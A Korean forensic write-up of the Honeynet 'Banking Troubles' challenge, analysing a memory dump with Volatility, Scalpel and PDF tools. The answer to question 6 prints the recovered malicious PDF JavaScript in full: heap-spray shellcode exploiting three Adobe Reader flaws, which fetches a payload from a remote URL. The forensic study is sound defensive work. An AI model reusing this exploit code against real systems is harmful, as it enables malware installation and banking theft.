이번 첼린지는 메모리 덤프에 대한 분석인데, 처음 해보는거라 풀이를 참고했다. 우선 Volatility 툴을 처음 알게되었고 사용법을 어느정도 익히게 된거 같아 나름 뿌듯하다.
http://www.honeynet.org/challenges/2010_3_banking_troubles
1. List the processes that were running on the victim’s machine. Which process was most likely responsible for the initial exploit? (2pts)
우선 프로세스 리스트는 Volatility (https://www.volatilesystems.com/default/volatility) 를 이용하여 확인할 수 있다.
그리고 배치파일 (http://volatility.googlecode.com/files/vol-Report%28win%29.zip) 을 이용하면 분석하기 편하다.
좀 더 자세한 내용은 http://ykei.egloos.com/5054373 페이지를 참고하기 바란다.
D:\Security Tools\Forensic\Volatility-1.3_Beta>c:\Python27\python.exe volatility pslist -f Bob.vmem
Name Pid PPid Thds Hnds Time
System 4 0 58 573 Thu Jan 01 00:00:00 1970
smss.exe 548 4 3 21 Fri Feb 26 03:34:02 2010
csrss.exe 612 548 12 423 Fri Feb 26 03:34:04 2010
winlogon.exe 644 548 21 521 Fri Feb 26 03:34:04 2010
services.exe 688 644 16 293 Fri Feb 26 03:34:05 2010
lsass.exe 700 644 22 416 Fri Feb 26 03:34:06 2010
vmacthlp.exe 852 688 1 35 Fri Feb 26 03:34:06 2010
svchost.exe 880 688 28 340 Fri Feb 26 03:34:07 2010
svchost.exe 948 688 10 276 Fri Feb 26 03:34:07 2010
svchost.exe 1040 688 83 1515 Fri Feb 26 03:34:07 2010
svchost.exe 1100 688 6 96 Fri Feb 26 03:34:07 2010
svchost.exe 1244 688 19 239 Fri Feb 26 03:34:08 2010
spoolsv.exe 1460 688 11 129 Fri Feb 26 03:34:10 2010
vmtoolsd.exe 1628 688 5 220 Fri Feb 26 03:34:25 2010
VMUpgradeHelper 1836 688 4 108 Fri Feb 26 03:34:34 2010
alg.exe 2024 688 7 130 Fri Feb 26 03:34:35 2010
explorer.exe 1756 1660 14 345 Fri Feb 26 03:34:38 2010
VMwareTray.exe 1108 1756 1 59 Fri Feb 26 03:34:39 2010
VMwareUser.exe 1116 1756 4 179 Fri Feb 26 03:34:39 2010
wscntfy.exe 1132 1040 1 38 Fri Feb 26 03:34:40 2010
msiexec.exe 244 688 5 181 Fri Feb 26 03:46:06 2010
msiexec.exe 452 244 0 -1 Fri Feb 26 03:46:07 2010
wuauclt.exe 440 1040 8 188 Sat Feb 27 19:48:49 2010
wuauclt.exe 232 1040 4 136 Sat Feb 27 19:49:11 2010
firefox.exe 888 1756 9 172 Sat Feb 27 20:11:53 2010
AcroRd32.exe 1752 888 8 184 Sat Feb 27 20:12:23 2010
svchost.exe 1384 688 9 101 Sat Feb 27 20:12:36 2010
추가로 exploit이 실행된 프로세스는 PDF 파일을 연 후 문제가 발생했다고 하였으니 AcroRd32.exe 일 것으로 보인다.
그리고 AcroRd32.exe 프로세스의 PID는 1752 이며 PPID는 888로 firefox.exe 이다.
따라서 Firefox 웹브라우져에서 PDF 파일을 연 후 문제가 발생한 것으로 볼 수 있다.
2. List the sockets that were open on the victim’s machine during infection. Are there any suspicious processes that have sockets open? (4pts)
D:\Security Tools\Forensic\Volatility-1.3_Beta>c:\Python27\python.exe volatility connscan2 -f Bob.vmem
Local Address Remote Address Pid
------------------------- ------------------------- ------
192.168.0.176:1176 212.150.164.203:80 888
192.168.0.176:1189 192.168.0.1:9393 1244
192.168.0.176:2869 192.168.0.1:30379 1244
192.168.0.176:2869 192.168.0.1:30380 4
0.0.0.0:0 80.206.204.129:0 0
127.0.0.1:1168 127.0.0.1:1169 888
192.168.0.176:1172 66.249.91.104:80 888
127.0.0.1:1169 127.0.0.1:1168 888
192.168.0.176:1171 66.249.90.104:80 888
192.168.0.176:1178 212.150.164.203:80 1752
192.168.0.176:1184 193.104.22.71:80 880
192.168.0.176:1185 193.104.22.71:80 880
PID가 1752인것을 찾으면 212.150.164.203 이다. 그리고 PID가 888인 Firefox 브라우져에서 역시 212.150.164.203 으로 접근한 기록이 있다.
3. List any suspicious URLs that may be in the suspected process’s memory. (2pts)
strings Bob.vmem | grep http > output.txt
위 명령어로 output.txt로 저장할 수 있다. 너무 많군 -_-
4. Are there any other processes that contain URLs that may point to banking troubles? If so, what are these processes and what are the URLs? (4pts)
위 3번에서 저장한 리스트를 대상으로 아래 명령어로 검색을 하면 아래 결과가 나온다.
D:\Security Tools\Forensic\Volatility-1.3_Beta>cat output | grep bank
Ahttps://onlineeast#.bankofamerica.com/cgi-bin/ias/*/GotoWelcome
Ahttps://onlineeast#.bankofamerica.com/cgi-bin/ias/*/GotoWelcome
Ahttps://onlineeast#.bankofamerica.com/cgi-bin/ias/*/GotoWelcome
.
.
.
[이하 생략]
5. Were there any files that were able to be extracted from the initial process? How were these files extracted? (6pts)
우선 volatility 를 이용하여 PID가 1752인 프로세스 덤프를 저장하도록 한다.
D:\Security Tools\Forensic\Volatility-1.3_Beta>c:\Python27\python.exe volatility usrdmp_ex_2 -f Bob.vmem -p 1752
저장 후 Scapel을 이용하여 PDF 파일만 추출하도록 conf 파일에 설정 후 추출하면 총 9개의 파일을 추출할 수 있다.
6. If there was a file extracted from the initial process, what techniques did it use to perform the exploit? (8pts)
우선 file 명령어를 이용하여 확인하면 아래와 같다.
D:\Security Tools\Forensic\scalpel-1.60\pdf\pdf-0-0>file *
00000000.pdf: data
00000001.pdf: data
00000002.pdf: PDF document, version .
00000003.pdf: PDF document, version %..
00000004.pdf: PDF document, version 1.5
00000005.pdf: PDF document, version 1.5
00000006.pdf: PDF document, version 1.5
00000007.pdf: PDF document, version 1.4
00000008.pdf: PDF document, version 1.3
4, 5, 6, 7, 8 파일명의 파일만 정상적인 파일로 보이니 해당 파일에 대해 PDFiD (http://blog.didierstevens.com/2009/03/31/pdfid/) 를 이용하여 확인하면 6번 파일에서 javascript를 확인할 수 있다.
6번 파일을 pdf-parser (http://blog.didierstevens.com/programs/pdf-tools/)를 이용하여 확인하면 아래와 같다.
D:\Security Tools\Forensic\scalpel-1.60\pdf\pdf-0-0>pdfid.py 00000006.pdf
PDFiD 0.0.10 00000006.pdf
PDF Header: %PDF-1.5
obj 113
endobj 113
stream 35
endstream 35
xref 5
trailer 5
startxref 4
/Page 9
/Encrypt 1
/ObjStm 0
/JS 1
/JavaScript 1
/AA 1
/OpenAction 0
/AcroForm 0
/JBIG2Decode 0
/RichMedia 0
/Colors > 2^24 0
D:\Security Tools\Forensic\scalpel-1.60\pdf\pdf-0-0>pdf-parser.py --search javascript 00000006.pdf
obj 11 0
Type:
Referencing: 1054 0 R
[(1, '\r\n'), (2, '<<'), (2, '/S'), (2, '/JavaScript'), (2, '/JS'), (1, ' '), (3, '1054'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (2, '>>'), (1, '\r\n')]
<<
/S /JavaScript
/JS 1054 0 R
>>
D:\Security Tools\Forensic\scalpel-1.60\pdf\pdf-0-0>pdf-parser.py -o 11 00000006.pdf
obj 11 0
Type:
Referencing:
[(1, '\r'), (3, '0'), (1, ' \r')]
obj 11 0
Type:
Referencing: 1054 0 R
[(1, '\r\n'), (2, '<<'), (2, '/S'), (2, '/JavaScript'), (2, '/JS'), (1, ' '), (3, '1054'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (2, '>>'), (1, '\r\n')]
<<
/S /JavaScript
/JS 1054 0 R
>>
D:\Security Tools\Forensic\scalpel-1.60\pdf\pdf-0-0>pdf-parser.py -o 1054 --raw --filter 00000006.pdf
obj 1054 0
Type:
Referencing:
Contains stream
<</Length 0000/Filter [/F#6c#61#74e#44e#63#6fde/#41#53#43II#38#35#44#65#63#6fd#65]>>
<<
/Length 0000
/Filter [
/FlateDecode /ASCII85Decode]
>>
var xtdxJYVm='0111100000101011000001110010111100100001001101110001111100011011001011110100111100100101001100000001000100100111000000100110100100000011000111100011111100101001001011000100001000000011000011010000001100111000001000110100100000101100000110000001000000101110001110010000001001011001000111000001100100100010000111110000001001011101000000000001111100110111001001010010011000100010011011110111111001001011001010010011001000101111001100100010110101100110001010110011101100110011001110010000000000001101011110000111100000010100001100100011100000000011000010110110100000010100011011000011011100101011000110100011101100000101001110010111000100000010000000100010100000000011001100110100010000111100001001000000011000001011001000010010000100100011000000000001011001001111011110110101011000100001001011100001010000100101001110000110100001110100010001010111100100110001010110000011001000111000001110110010011000000011001100000000001100011010010100010000000100100010000110000011011000011110010011110111101000111000000001100010110100010101011000010010111100100010000011000001110100101000010001000011110000001111001111000110110101001001000010100001101100100110010100100101100101001011001101000001010001110111001101110100011001111101000101100000110001110110010110010100111001000000001110010000010101111110000100100110010101011001000010010010001001011010011010010101111100101011000100100000001001010111000110000100100000101110000100000011110001001001000101000110110101100000001010100000010101010100001100010010110100101110001110010000110001100000010011100101110101110100001101100001111001001000010011100001011100010000000101010001001101000110011101100110100000001010000100000001100101011101001001110101001001001110001101000001010001101111001000000110001101110111000111010011001001011110010110110101100100010110001010100001011001010000001100010100011000010010000010010001001101110011000000100111010101011010001101010000011000011101011001000000101001110101000010110010011100010010011111110101110100111011001100010001001100110111000001110101100100010100000001000011100101011001000100110000110000011011001111110010010001111111010001010111111000100010000010010000000100100100001011110101000001011110001010110010010001001100011110100111101101000011000010000001001001100111011100000110000001110001000100100001100001000001011110000100110001011110000001100000011101011111010001000110000000001101001110100000110001010010000001110110000000101001001110100011111001010000011100100111101101010111000101010000001101111011010101000111110001000000001100110001111001010100011100000010100101000101000011100001001001001110010011110111110000100110001001010001111101100110010111100101100101000111001010000001100101100000010010110011110001100111000010010000010001001100010010100010111001101000001110010010111101010001010000010101101001011101000110010001011101111000010110000010100000010111001100100011110101100101010111010001010000010010001011100000001100100011001100000101011000101111001110100001101001111101010000000100001101011011001101110001110100110100011110110101111101111011000111010010011101111110010010000111101101110111000111100001001000001011000100010010000001111100001101000001100101110010011111000111001000000010000110110010110001011000011111100001010000101100001101000010111100010100001011110010001000000011001101000010011001011000000100110101010001110100001010100000111101000001011111000000001001010100001110100001010001000111000101100010111101010100001100000001100101010010011001100111100100100000001100000011000101010001010110010110010101110101001101100011010001100001011111100011011101011100001001000011111001011101001100000101110000101000000011000011000001111001000000000111000101010010000110010010011001111111000110010100011001000001001010010000111100110101011111010101011101110010000100000011101001100010011000000100101100111010000010000001110101010011010101110110111000111011000101010001010001101100001101110010101101100010000110010011101101010001010101010101111000010111000111010011011001111001000100100001100101111100000011000010000101000110011100000100001000101011001111010010111101010110011000000100001101111001000011110001111001110001010101110011100001011101001100100001110101001000000000100011100100000101000111100011000100101101010000010110011000110010000100100010010000000111001011010010101001100001000101100010011000001111000001000010110100101110000110010001100000110100010001100110011001010011000011000010011100000011011011100110101100010101001100110011110000000011000001100001111101010101001100000011011100100101011101100100110100100000001011110000011001110111000000110100011101101111000011000000001001100111010111010111110001111000000100100001101101111001011011100010011100010100000010000001011001011011011000010110000001110010000110000011101100110110011100010001011100101111000100010010110001110010000110000111010100111011001011000010001001000001010010110000001101011110000011100011011001100110011101010100110101001010001010010001101101000100001000010111010000101000001110110000010101001110011001110110001100110010000100110010110101001111010001100111001101111011001010110000011101100001000110110100001101111001000011100010000001001101011101100100000000101101001100100010110001010010001010000011011001101111001100100010001001000011001010100101000000001101001110110010010000111100000111110001011000000110000011010011000001011000011100100100010001110000001001000000000101110010011100100110111101000110001001010011001100010011011111100100010101000110001101100000011101100001011110110100110001110001001100110011111101001111000010100101100001000111001001010001010001111110010100000100011001001100001101010010110000010010010000000100111001100011001111010001001101111100010001110101011000001101001011000011011101101001011101000011011001010011000110100000000001101101011001110111111001111111001001000000011001001010011110100010010101101101000101000001010001111110000000110101111000010001001010110000000100101001000101000111101001010101000101010001100101010100010011100101000101110110001111010000000001000011011111000110011100010100000101100001101001100111011001100011111000000010001101000001000100110101010100110100010001001100001101000011110100001110001011000100101101001100001010000001101101111111001011110101001000101000000110010001001101011000010110100011001100110010000100010001100001001111011101010111011101110011001100000011001100010100001001110011000001010101000100110011110100100111010001010010001000010111000010100010011100111100000000000101100101100000000001100000001101110001011110010101001001100000001010000000110001100011011111000101001101011011000100110001011001000110010010010100011101110000000110100011010001100010001011110110101100110100000110010010111101111101011010100111111000101100001100100001100101100000010110010100010001000011000011000011111101011000010100010111010001000100001001000011001001110100000001010111100001110111000110100001100001011100010011110111100100010011001001100011011101011001010000000101101001100000000101000001010001101101011101110110011100000001000100110010001101110011001101110101110100110001000101000011000101100111000010000101000001110010000110000001010001011101011101110111101101010100000010100000011001110101010110110110000100000111001100010001101101101111001000110101101100110010000011100010001001100010000011010110000000010110000010100011000001010011010001000110001100110111001111110011001001110110000010110100011101111000000010000001101101000010011011010101111001100101001101010001110001001010001011000101011001011011000001100010111101010100000001110100011101001000000110010011011101111000010110000110010101100110000101010001001001000110011110100110000001111110000010010010010001000000011011000110000100000011000111100010000001110110010001000111100100111111000100110000111101011101011001100111101001110110000001010011001101101100010110110111100100101111000111100000000001100000010001110101100001100111001010000000111101100000011000010110000101101101001100000001100101100001000100100110011001100110001100000010001101001101010111110111111000110101000110110000010101000101010111000111001101011111001010100001100001000010010100010101111001110100000110100011001001000000010110100110000000110110000100000001110101101110011000110101110001011001001100110011000101011000010001000111011000101011001110000011100001000000010110010111011101100000010100100111101001011000011000010101001001000001011001000100010101001100011011000111100101000101011011110100101001110010010011100101100001011110011010010110100001100101011000010100101001010101011001110110010001010000010101100110011101000010010100110110000001000100011100100110010001100011011001110101111101101001000111010011001100110000011100110001111000111001000110110011101000001111010010100100101101110100010111100111000001101000011101000111001001111111011100110100101100000010001000100011110101101100000111110001001100010001000100010000111101001100001110010000110001111001001000110011011000011101010100110000011100011111001111110001000000010101011001110111110001110011011011000111110001001001011101010110011001011010001001000001011000001010010100100000110100000001000001110000101000101111010101110000110100111001001010100011101100101010010000100001101000011100000000100001000000111001001001010100001001011100011011100001000000010000000101010110101000001010000010110001100000111000000000110101100100101111001111100011011100010001000001100111100001100111001111000000000000110100001101010000100001000110011100110000000001100110011011000111100001111101001100010001001100000101010101100000000100110011001010100000010100100101010011000010000000010110000110000110001001110010001010100000010001001111010111010111100001111010001110100011100001101011011001010101001001110110011101000110101101111100000111100001100100000011000110010011111101001111001110000000101100010001001110000010010001101110001101100010111000111110001000110011110001100000000100010001111100011101000001110011001001000111011111000000001000110110001001010101010100011000000000100001110000110000000101010110101001100101000001100011000100011111000101010000011101110111011100010101011101001111010000000101011101101001010111010110010101000011001010110010010000111011001001110010111101111100000000000011111000111101010111100001101100100010001111000101010100000011000001110000010000100011001111110110010001010101011010110011010100000000000010010000010000110010010101110001101000001111000100000000011000100000010101000010110100010110001001110010110000001111011110010100000101100001000101000011111100000010001011010001101100101100000010010010001000010111001000010001100000001001001011000100101100110000000000100011011100101110001110100110111000110010000110110000001000100100001000010111110100011110011011000000001000000110000000100110111000100001000110010010100100000101000001010110100000100101001010010011110101011000010000000010101100110100010111010011011101000100001000010001000100110111010111100010010001010110000010100110011101000000010100000000011000001100000110110010101000100010010001100001011000000000001011100000001100001000011000100011111100000011000101000000001000101101000010100101101001110010011110100101011001010001010101010101111100101011001111110011111000100001000001110101001101101011000001000000011100100000001111110011111101010011001000100011111100101101001101110100110000101111000001110001010000011001000011100010110000011010000001000000000000110011000011110111011100010001001101100010111000111001001000100010111101001011000001000011110100011000000110000000011000000100001100100001110100000010000011100011110000100100000110010001110000000001000000100100010000101111000100000011101000000101001110000101000101010010011010110101010100100100001001010001010101010010000101100010011000001010000000100000101100100111010100010101010100110011011100000000000000011000000000000010000000110111000000000001100100101111011101010001011100010101001111010110101001011100000000100001111100001010001001000111010100110001001100100010101101100101000011110001000100111101011101100000110000111001001010000010100000101011011011110111111001111001000100010001101000000100000000010001110100011100001000110001111101010011000101100001011000011000011000010011101000100011000000010101101100100010000111010010000101101111001011100011110000000110001110000010101000111111010110100011100000001100000011000111100000001000001111110001100100000001000001000011110001110000010110010100101100100010000001010000000001000110001010010010100000110001001011000110110001000111001000110000010000011000011110010010110001010011001011010011111100101000011001010011011100000101001010010100001100101001001101000011010100010101000000100001100000001111001110000011111001110000011111100110000000001010000010110010110001001000010101110110101101010000000110110001111100100100001101110001001100000100011001110000101100111111001001100110000100101101011001010000000100100000000001010101000001001010000010110110011001100011011010110111011101000011010010000111010001010010011111010011111100111000001001100111111100111100001010000011001101111001010100000010110000100001000110100111111101010110011101100001101100100010010000000000011001000001010110000000100100011001010000110111101001010101010001100011001000000000010001000000110001011010011101100001001100010011010111110110010001000001001010100010111000011100011000100011001101001010001110110000101100111100011101110000111101111110011001100011111000011100011100000010010100011011000000010000111000110110010101100101001001010001010111000011011100111001010000100110100100010011000101000010111000001111011100010101110101110001000000010001010100111100011000100011010101011100010000000000100000100000010011110001001101000111011000000011001000111111011110010111010001101101001100000000111000000010010001100010110001100111001101010000100000011101010100100001000101110111011001000001011100111010000100110101101000101000011110010000011000111000001001100111000001111100001000000010110100101111001101010000110101101001001110000011111100110110010111000011011000011111000010000000111100011001011111110101000001110110001110000011011100111001001000010000101001001100010001100011111100100011011000010100100101000101011110010011011100110000011001110111110101111101011111000011100000011110010111100101110001110100011111110010101100111000011110000101111001110110000011110000101100111000010101110010000001101011000001000011010100001101011110110111010101000000010110100011010000100000011000100110000101110101010010010000111100111101011111000101111000101100010000110001011000000101010110000111010101110010001001110001000100011100011000100101000101011001011001110011101100111011011100010110001100001100011000100011111100100101010001110111010100001100011000110000011000111010011001000100011101101100010111000000110000100111010101000111000000000101001111010000110100010010010001010110000000100011001100000001111100011111000101110010111101101000000111100010111000000011010100010100010001010011011001110010110000111000000010000111100101111111011101000000111000011000010000000110000001000110011000110001101100110100001100010001110000010010010101000010110100101100010111100111100101110010000101100010110100101100011100000111111100001110000101100000100100110100000000010011000000101001000100010010111100111110010101000010001101011100010000010001100000100011011001100111000100110000010101000001110100011100011111110011011100110100010000000001101000111000010100110111101101000001001010000011011100010000010100010100011101101011011001100000010000110110010100100101110000100001011111110000100000000011011100100010011101001011001110000011011000110001011010110000110001111001011111000011100000100110011100100000111001100101010001110000101000010110001101110100000101011100011000100010101000111000010100010111111001110110001010100011111100001100010111000100101001001000000001000011000000000000011111100001011100000010010101000010101100010001010110000110001001100011001100010011110100110100011101110010101100101101011000110000011000000001010001110111011101011111000010000010100100101101010101110111111101110010011011110000110100111111010001110100101000000111010011100000010000110111011011010011000100001011000101000001011000110000001100010111010101100011000001110001001100011000000010000000110000001010010110100010100000010010001011100011011000101110001010000000101100100001000010000110011001001001010101000011101000110001001001010101001001000000001110100011111100011111000011110000000100011111011110100001111100101101001001010111110101110101000010110001001000011100010000110000101101111110010000100011100000101111011100100110101101011101011001100000110000111110010001100100111000010111001000010011111000011011011111110111011101011110010011000000100000000111001000000101011000100011000110110010111100101101011011010001001101111001001011010010110000000111010110100100000100000010011111010010101000100110010111010111000101000000011010100010111000111100011000110000010001110101001000110011101100110010010110100101000101010111001111000001101100101111011100010101100101000100011111010011010100100001011110100000000001011100011100010001011000001100010000010100001101011001000101110000111000000001011111100011011000001111011011110001111100110010011101010001010001100011001100000001011100011010001111100011000000100110000011100001100100010010010111100101100001111011011110100011011000000010011011000111100001101111011111010011000100100011000001100111101001110101010101110011010000010011011100100101111101111011011001100010100000100000011011000000100001001111010110110000101100011011010001100100111001000001011110000001101100010001001100010101101001111110011111000011100100010110011010010101100101111101001001000011101100111011010111110101100000011011011100000000010000011111011100000111110101000011011100010001101100110111011101110111011100100011011101100000010100111111011100110000001101010101000011000000011000111110001100100001010001100100010000100011000100000010010101000101000101011110010000010000100100110110010100000111111001110111001100110001000000010110010100100110001000000000000100100001101100010110000101010111100101100111010101010000101000100101000101110000010001001110010011000000101100011001010100100010101001101110000110110000111100101111010110000100001000111110000000110001000100101101011000110100011101011111010001000010010000111010001111110010110000000011011000010000011000110110000100100100011100010011001000000001100100100111000101100000110001110000010010000000011000100101011010000111101101110010011101000010101000000111010011010100010001110111010111010000111000011111010110000110011001000110011011100001011000110010010101110010100101001011001100000
위 코드를 풀면 아래와 같이 나온다.
function OzWJi(rzRoI,fxLUb){while(rzRoI.length*2<fxLUb){rzRoI+=rzRoI;}
return rzRoI.substring(0,fxLUb/2);}
function bSuTN(){var Uueqk=sly("\uC033\u8B64\u3040\u0C78\u408B\u8B0C\u1C70\u8BAD\u0858\u09EB\u408B\u8D34\u7C40\u588B\u6A3C\u5A44\uE2D1\uE22B\uEC8B\u4FEB\u525A\uEA83\u8956\u0455\u5756\u738B\u8B3C\u3374\u0378\u56F3\u768B\u0320\u33F3\u49C9\u4150\u33AD\u36FF\uBE0F\u0314\uF238\u0874\uCFC1\u030D\u40FA\uEFEB\u3B58\u75F8\u5EE5\u468B\u0324\u66C3\u0C8B\u8B48\u1C56\uD303\u048B\u038A\u5FC3\u505E\u8DC3\u087D\u5257\u33B8\u8ACA\uE85B\uFFA2\uFFFF\uC032\uF78B\uAEF2\uB84F\u2E65\u7865\u66AB\u6698\uB0AB\u8A6C\u98E0\u6850\u6E6F\u642E\u7568\u6C72\u546D\u8EB8\u0E4E\uFFEC\u0455\u5093\uC033\u5050\u8B56\u0455\uC283\u837F\u31C2\u5052\u36B8\u2F1A\uFF70\u0455\u335B\u57FF\uB856\uFE98\u0E8A\u55FF\u5704\uEFB8\uE0CE\uFF60\u0455\u7468\u7074\u2F3A\u732F\u6165\u6372\u2D68\u656E\u7774\u726F\u2D6B\u6C70\u7375\u632E\u6D6F\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u2074\u7845\u6C70\u726F\u7265\u3620\u302E\u6526\u323D\u0000%25%30%25%30%25%30%25%30%25%30%25%30");var HWXsi=202116108;var ZkzwV=[];var HsVTm=4194304;var EgAxi=Uueqk.length*2;var fxLUb=HsVTm-(EgAxi+0x38);var rzRoI=sly("\u9090\u9090");rzRoI=OzWJi(rzRoI,fxLUb);var tfFQG=(HWXsi-4194304)/HsVTm;for(var gtqHE=0;gtqHE<tfFQG;gtqHE++){ZkzwV[gtqHE]=rzRoI+Uueqk;}
var eHmqR=sly("\u0c0c\u0c0c");while(eHmqR.length<44952)eHmqR+=eHmqR;this.collabStore=Collab.collectEmailInfo({subj:"",msg:eHmqR});}
function Soy(){var dwl=new Array();function ppu(BtM,dqO){while(BtM.length*2<dqO){BtM+=BtM;}
BtM=BtM.substring(0,dqO/2);return BtM;}
XrS=0x30303030;HRb=sly("\uC033\u8B64\u3040\u0C78\u408B\u8B0C\u1C70\u8BAD\u0858\u09EB\u408B\u8D34\u7C40\u588B\u6A3C\u5A44\uE2D1\uE22B\uEC8B\u4FEB\u525A\uEA83\u8956\u0455\u5756\u738B\u8B3C\u3374\u0378\u56F3\u768B\u0320\u33F3\u49C9\u4150\u33AD\u36FF\uBE0F\u0314\uF238\u0874\uCFC1\u030D\u40FA\uEFEB\u3B58\u75F8\u5EE5\u468B\u0324\u66C3\u0C8B\u8B48\u1C56\uD303\u048B\u038A\u5FC3\u505E\u8DC3\u087D\u5257\u33B8\u8ACA\uE85B\uFFA2\uFFFF\uC032\uF78B\uAEF2\uB84F\u2E65\u7865\u66AB\u6698\uB0AB\u8A6C\u98E0\u6850\u6E6F\u642E\u7568\u6C72\u546D\u8EB8\u0E4E\uFFEC\u0455\u5093\uC033\u5050\u8B56\u0455\uC283\u837F\u31C2\u5052\u36B8\u2F1A\uFF70\u0455\u335B\u57FF\uB856\uFE98\u0E8A\u55FF\u5704\uEFB8\uE0CE\uFF60\u0455\u7468\u7074\u2F3A\u732F\u6165\u6372\u2D68\u656E\u7774\u726F\u2D6B\u6C70\u7375\u632E\u6D6F\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u2074\u7845\u6C70\u726F\u7265\u3620\u302E\u6526\u313D\u0000\u0000%23%26%23%26%23%26%23%26%23%26%23%26%23%26%23%26%23%26%23%26");var jxU=4194304;var RaR=HRb.length*2;var dqO=jxU-(RaR+0x38);var BtM=sly("\u9090\u9090");BtM=ppu(BtM,dqO);var JYD=(XrS-4194304)/jxU;for(var Prn=0;Prn<JYD;Prn++){dwl[Prn]=BtM+HRb;}
var IdI="66055447950636260127";for(sly=0;sly<138*2;sly++){IdI+="3";}
util.printf("%45000f",IdI);}
function ynu(shG)
{shG=shG.replace(/[\+1]/g,"0");shG=shG.replace(/[\+2]/g,"9");shG=shG.replace(/[\+3]/g,"8");shG=shG.replace(/[\+4]/g,"7");shG=shG.replace(/[\+5]/g,"6");shG=shG.replace(/[\+6]/g,"5");shG=shG.replace(/[\+7]/g,"4");shG=shG.replace(/[\+8]/g,"3");shG=shG.replace(/[\+9]/g,"2");shG=shG.replace(/[\+0]/g,"1");return shG;}
function XiIHG(){var cqcNr=sly("\uC033\u8B64\u3040\u0C78\u408B\u8B0C\u1C70\u8BAD\u0858\u09EB\u408B\u8D34\u7C40\u588B\u6A3C\u5A44\uE2D1\uE22B\uEC8B\u4FEB\u525A\uEA83\u8956\u0455\u5756\u738B\u8B3C\u3374\u0378\u56F3\u768B\u0320\u33F3\u49C9\u4150\u33AD\u36FF\uBE0F\u0314\uF238\u0874\uCFC1\u030D\u40FA\uEFEB\u3B58\u75F8\u5EE5\u468B\u0324\u66C3\u0C8B\u8B48\u1C56\uD303\u048B\u038A\u5FC3\u505E\u8DC3\u087D\u5257\u33B8\u8ACA\uE85B\uFFA2\uFFFF\uC032\uF78B\uAEF2\uB84F\u2E65\u7865\u66AB\u6698\uB0AB\u8A6C\u98E0\u6850\u6E6F\u642E\u7568\u6C72\u546D\u8EB8\u0E4E\uFFEC\u0455\u5093\uC033\u5050\u8B56\u0455\uC283\u837F\u31C2\u5052\u36B8\u2F1A\uFF70\u0455\u335B\u57FF\uB856\uFE98\u0E8A\u55FF\u5704\uEFB8\uE0CE\uFF60\u0455\u7468\u7074\u2F3A\u732F\u6165\u6372\u2D68\u656E\u7774\u726F\u2D6B\u6C70\u7375\u632E\u6D6F\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u2074\u7845\u6C70\u726F\u7265\u3620\u302E\u6526\u333D\u0000\u1334\u1334");dPl=sly("\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090")+cqcNr;FQI=sly("\u9090\u9090");fhT=5*2;sLa=fhT+dPl.length;while(FQI.length<sLa)FQI+=FQI;NJn=FQI.substring(0,sLa);eUq=FQI.substring(0,FQI.length-sLa);while(eUq.length+sLa<0x40000)eUq=eUq+eUq+NJn;Cwy=[];for(XWT=0;XWT<180;XWT++)Cwy[XWT]=eUq+dPl;var kKG=4012;var LwZ=Array(kKG);for(XWT=0;XWT<kKG;XWT++)
{LwZ[XWT]=sly("\u000a\u000a\u000a\u000a");}
Collab.getIcon(LwZ+"_N.bundle");}
var sly=unescape,ZgA=app.viewerVersion.toString(),TjP=this;if(ZgA<8)
{bSuTN();}
if(ZgA>=8&&ZgA<9)
{Soy();}
if(ZgA<=9)
{XiIHG();}
Adobe Reader 버전이 8보다 작으면 아래 취약점을 이용한다.
bSuTN() : Collab.collectEmailInfo / CVE-2007-5659
Adobe Reader 버전이 8 이거나 8보다 크고 9보다 작을 경우 아래 취약점을 이용한다.
Soy() : util.printf / CVE-2008-2992
Adobe Reader 버전이 9 이거나 9보다 작을 경우 아래 취약점을 이용한다.
XiIHG() : Collab.getIcon / CVE-2009-0927
추가로 최종적으로 연결하는 URL은 아래와 같다.
http://search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=x
7. List suspicious files that were loaded by any processes on the victim’s machine. From this information, what was a possible payload of the initial exploit be that would be affecting the victim’s bank account? (2pts)
3번에서 저장한 output 파일을 이용하여 위 Exploit 코드에서 접근하는 URL을 검색하면 아래와 같다.
D:\Security Tools\Forensic\Volatility-1.3_Beta>cat output | grep search-network
http://search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=2
http://search-network-plus.com/cache/PDF.php?st=Internet%20Explorer%206.0
http://search-network-plus.com/favicon.ico
http://search-network-plus.com/cache/PDF.php?st=Internet%20Explorer%206.0
http://search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=2
http://search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=1
http://search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=2
http://search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=2
http://search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=2
http://search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=2
http://search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=2
.
.
[생략]
그리고 PID가 1752인 프로세스와 관련된 파일을 검색하면 아래와 같다.
D:\Security Tools\Forensic\Volatility-1.3_Beta>c:\Python27\python.exe volatility files -p 1752 -f Bob.vmem
Pid: 1752
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2180_x-ww_a84f1ff9
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2180_x-ww_a84f1ff9
File \lsarpc
File \DOCUME~1\ADMINI~1\LOCALS~1\Temp\Acr107.tmp
File \DOCUME~1\ADMINI~1\LOCALS~1\Temp\Acr106.tmp
